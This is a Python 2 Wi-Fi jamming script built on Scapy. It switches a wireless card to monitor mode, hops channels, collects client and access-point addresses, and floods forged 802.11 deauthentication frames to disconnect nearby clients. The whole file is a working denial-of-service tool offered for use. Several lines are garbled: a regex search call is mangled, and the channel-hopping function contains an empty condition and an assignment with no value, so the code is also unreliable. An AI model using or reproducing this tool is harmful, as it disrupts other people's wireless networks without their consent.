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- #!/usr/bin/env python
- import logging
- logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Shut up Scapy
- from scapy.all import *
- conf.verb = 0 # Scapy I thought I told you to shut up
- import os
- import sys
- import time
- from threading import Thread, Lock
- from subprocess import Popen, PIPE
- from signal import SIGINT, signal
- import argparse
- import socket
- import struct
- import fcntl
- # Console colors
- W = '\033[0m' # white (normal)
- R = '\033[31m' # red
- G = '\033[32m' # green
- O = '\033[33m' # orange
- B = '\033[34m' # blue
- P = '\033[35m' # purple
- C = '\033[36m' # cyan
- GR = '\033[37m' # gray
- T = '\033[93m' # tan
- def parse_args():
- #Create the arguments
- parser = argparse.ArgumentParser()
- parser.add_argument("-s", "--skip", help="Skip deauthing this MAC address. Example: -s 00:11:BB:33:44:AA")
- parser.add_argument("-i", "--interface", help="Choose monitor mode interface. By default script will find the most powerful interface and starts monitor mode on it. Example: -i mon5")
- parser.add_argument("-c", "--channel", help="Listen on and deauth only clients on the specified channel. Example: -c 6")
- parser.add_argument("-m", "--maximum", help="Choose the maximum number of clients to deauth. List of clients will be emptied and repopulated after hitting the limit. Example: -m 5")
- parser.add_argument("-n", "--noupdate", help="Do not clear the deauth list when the maximum (-m) number of client/AP combos is reached. Must be used in conjunction with -m. Example: -m 10 -n", action='store_true')
- parser.add_argument("-t", "--timeinterval", help="Choose the time interval between packets being sent. Default is as fast as possible. If you see scapy errors like 'no buffer space' try: -t .00001")
- parser.add_argument("-p", "--packets", help="Choose the number of packets to send in each deauth burst. Default value is 1; 1 packet to the client and 1 packet to the AP. Send 2 deauth packets to the client and 2 deauth packets to the AP: -p 2")
- parser.add_argument("-d", "--directedonly", help="Skip the deauthentication packets to the broadcast address of the access points and only send them to client/AP pairs", action='store_true')
- return parser.parse_args()
- ########################################
- # Begin interface info and manipulation
- ########################################
- def get_mon_iface(args):
- global monitor_on
- monitors, interfaces = iwconfig()
- if args.interface:
- monitor_on = True
- return args.interface
- if len(monitors) > 0:
- monitor_on = True
- return monitors[0]
- else:
- # Start monitor mode on a wireless interface
- print '['+G+'*'+W+'] Finding the most powerful interface...'
- interface = get_iface(interfaces)
- monmode = start_mon_mode(interface)
- return monmode
- def iwconfig():
- monitors = []
- interfaces = {}
- proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN)
- for line in proc.communicate()[0].split('\n'):
- if len(line) == 0: continue # Isn't an empty string
- if line[0] != ' ': # Doesn't start with space
- wired_search ='eth[0-9]|em[0-9]|p[1-9]p[1-9]', line)
- if not wired_search: # Isn't wired
- iface = line[:line.find(' ')] # is the interface
- if 'Mode:Monitor' in line:
- monitors.append(iface)
- elif 'IEEE 802.11' in line:
- if "ESSID:\"" in line:
- interfaces[iface] = 1
- else:
- interfaces[iface] = 0
- return monitors, interfaces
- def get_iface(interfaces):
- scanned_aps = []
- if len(interfaces) < 1:
- sys.exit('['+R+'-'+W+'] No wireless interfaces found, bring one up and try again')
- if len(interfaces) == 1:
- for interface in interfaces:
- return interface
- # Find most powerful interface
- for iface in interfaces:
- count = 0
- proc = Popen(['iwlist', iface, 'scan'], stdout=PIPE, stderr=DN)
- for line in proc.communicate()[0].split('\n'):
- if ' - Address:' in line: # first line in iwlist scan for a new AP
- count += 1
- scanned_aps.append((count, iface))
- print '['+G+'+'+W+'] Networks discovered by '+G+iface+W+': '+T+str(count)+W
- try:
- interface = max(scanned_aps)[1]
- return interface
- except Exception as e:
- for iface in interfaces:
- interface = iface
- print '['+R+'-'+W+'] Minor error:',e
- print ' Starting monitor mode on '+G+interface+W
- return interface
- def start_mon_mode(interface):
- print '['+G+'+'+W+'] Starting monitor mode on '+G+interface+W
- try:
- os.system('ifconfig %s down' % interface)
- os.system('iwconfig %s mode monitor' % interface)
- os.system('ifconfig %s up' % interface)
- return interface
- except Exception:
- sys.exit('['+R+'-'+W+'] Could not start monitor mode')
- def remove_mon_iface(mon_iface):
- os.system('ifconfig %s down' % mon_iface)
- os.system('iwconfig %s mode managed' % mon_iface)
- os.system('ifconfig %s up' % mon_iface)
- def mon_mac(mon_iface):
- '''
- '''
- s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
- info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', mon_iface[:15]))
- mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
- print '['+G+'*'+W+'] Monitor mode: '+G+mon_iface+W+' - '+O+mac+W
- return mac
- ########################################
- # End of interface info and manipulation
- ########################################
- def channel_hop(mon_iface, args):
- '''
- First time it runs through the channels it stays on each channel for 5 seconds
- in order to populate the deauth list nicely. After that it goes as fast as it can
- '''
- global monchannel, first_pass
- channelNum = 0
- while 1:
- if
- with lock:
- monchannel =
- else:
- channelNum +=1
- if channelNum > 11:
- channelNum = 1
- with lock:
- first_pass = 0
- with lock:
- monchannel = str(channelNum)
- proc = Popen(['iw', 'dev', mon_iface, 'set', 'channel', monchannel], stdout=DN, stderr=PIPE)
- err = None
- for line in proc.communicate()[1].split('\n'):
- if len(line) > 2: # iw dev shouldnt display output unless there's an error
- err = '['+R+'-'+W+'] Channel hopping failed: '+R+line+W
- output(err, monchannel)
- deauth(monchannel)
- if first_pass == 1:
- time.sleep(1)
- def deauth(monchannel):
- '''
- addr1=destination, addr2=source, addr3=bssid, addr4=bssid of gateway if there's
- multi-APs to one gateway. Constantly scans the clients_APs list and
- starts a thread to deauth each instance
- '''
- global first_pass
- if first_pass == 1:
- return
- pkts = []
- if len(clients_APs) > 0:
- with lock:
- for x in clients_APs:
- client = x[0]
- ap = x[1]
- ch = x[2]
- # Can't add a RadioTap() layer as the first layer or it's a malformed
- # Association request packet?
- # Append the packets to a new list so we don't have to hog the lock
- # type=0, subtype=12?
- if ch == monchannel:
- deauth_pkt1 = Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth()
- deauth_pkt2 = Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth()
- pkts.append(deauth_pkt1)
- pkts.append(deauth_pkt2)
- if len(APs) > 0:
- if not args.directedonly:
- with lock:
- for a in APs:
- ap = a[0]
- ch = a[1]
- if ch == monchannel:
- deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap)/Dot11Deauth()
- pkts.append(deauth_ap)
- if len(pkts) > 0:
- # prevent 'no buffer space' scapy error
- if not args.timeinterval:
- args.timeinterval = 0
- if not args.packets:
- args.packets = 1
- for p in pkts:
- send(p, inter=float(args.timeinterval), count=int(args.packets))
- #pass
- #time.sleep(.5)
- def output(err, monchannel):
- os.system('clear')
- if err:
- print err
- else:
- print '['+G+'+'+W+'] '+mon_iface+' channel: '+G+monchannel+W+'\n'
- if len(clients_APs) > 0:
- print ' Deauthing ch ESSID'
- # Print the deauth list
- with lock:
- for ca in clients_APs:
- if len(ca) > 3:
- print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2].ljust(2)+' - '+T+ca[3]+W
- else:
- print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2]
- if len(APs) > 0:
- print '\n Access Points ch ESSID'
- with lock:
- for ap in APs:
- print '['+T+'*'+W+'] '+O+ap[0]+W+' - '+ap[1].ljust(2)+' - '+T+ap[2]+W
- print ''
- def cb(pkt):
- '''
- Look for dot11 packets that aren't to or from broadcast address,
- are type 1 or 2 (control, data), and append the addr1 and addr2
- to the list of deauth targets.
- '''
- global clients_APs, APs
- # return these if's keeping clients_APs the same or just reset clients_APs?
- # I like the idea of the tool repopulating the variable more
- if args.maximum:
- if args.noupdate:
- if len(clients_APs) > int(args.maximum):
- return
- else:
- if len(clients_APs) > int(args.maximum):
- with lock:
- clients_APs = []
- APs = []
- # Broadcast, broadcast, IPv6mcast, spanning tree, spanning tree, multicast, broadcast
- ignore = ['ff:ff:ff:ff:ff:ff', '00:00:00:00:00:00', '33:33:00:', '33:33:ff:', '01:80:c2:00:00:00', '01:00:5e:', mon_MAC]
- if args.skip:
- ignore.append(args.skip)
- # We're adding the AP and channel to the deauth list at time of creation rather
- # than updating on the fly in order to avoid costly for loops that require a lock
- if pkt.haslayer(Dot11):
- if pkt.addr1 and pkt.addr2:
- if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
- APs_add(clients_APs, APs, pkt)
- for i in ignore:
- if i in pkt.addr1 or i in pkt.addr2:
- return
- # Management = 1, data = 2
- if pkt.type in [1, 2]:
- clients_APs_add(clients_APs, pkt.addr1, pkt.addr2)
- def APs_add(clients_APs, APs, pkt):
- ssid = pkt[Dot11Elt].info
- bssid = pkt[Dot11].addr3
- try:
- # Thanks to airoscapy for below
- ap_channel = str(ord(pkt[Dot11Elt:3].info))
- # Prevent 5GHz APs from being thrown into the mix
- chans = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11']
- if ap_channel not in chans:
- return
- except Exception as e:
- return
- if len(APs) == 0:
- with lock:
- return APs.append([bssid, ap_channel, ssid])
- else:
- for b in APs:
- if bssid in b[0]:
- return
- with lock:
- return APs.append([bssid, ap_channel, ssid])
- def clients_APs_add(clients_APs, addr1, addr2):
- if len(clients_APs) == 0:
- if len(APs) == 0:
- with lock:
- return clients_APs.append([addr1, addr2, monchannel])
- else:
- AP_check(addr1, addr2)
- # Append new clients/APs if they're not in the list
- else:
- for ca in clients_APs:
- if addr1 in ca and addr2 in ca:
- return
- if len(APs) > 0:
- return AP_check(addr1, addr2)
- else:
- with lock:
- return clients_APs.append([addr1, addr2, monchannel])
- def AP_check(addr1, addr2):
- for ap in APs:
- if ap[0].lower() in addr1.lower() or ap[0].lower() in addr2.lower():
- with lock:
- return clients_APs.append([addr1, addr2, ap[1], ap[2]])
- def stop(signal, frame):
- if monitor_on:
- sys.exit('\n['+R+'!'+W+'] Closing')
- else:
- remove_mon_iface(mon_iface)
- sys.exit('\n['+R+'!'+W+'] Closing')
- if __name__ == "__main__":
- if os.geteuid():
- sys.exit('['+R+'-'+W+'] Please run as root')
- clients_APs = []
- APs = []
- DN = open(os.devnull, 'w')
- lock = Lock()
- args = parse_args()
- monitor_on = None
- mon_iface = get_mon_iface(args)
- conf.iface = mon_iface
- mon_MAC = mon_mac(mon_iface)
- first_pass = 1
- # Start channel hopping
- hop = Thread(target=channel_hop, args=(mon_iface, args))
- hop.daemon = True
- hop.start()
- signal(SIGINT, stop)
- try:
- sniff(iface=mon_iface, store=0, prn=cb)
- except Exception as msg:
- remove_mon_iface(mon_iface)
- print '\n['+R+'!'+W+'] Closing'
- sys.exit(0)
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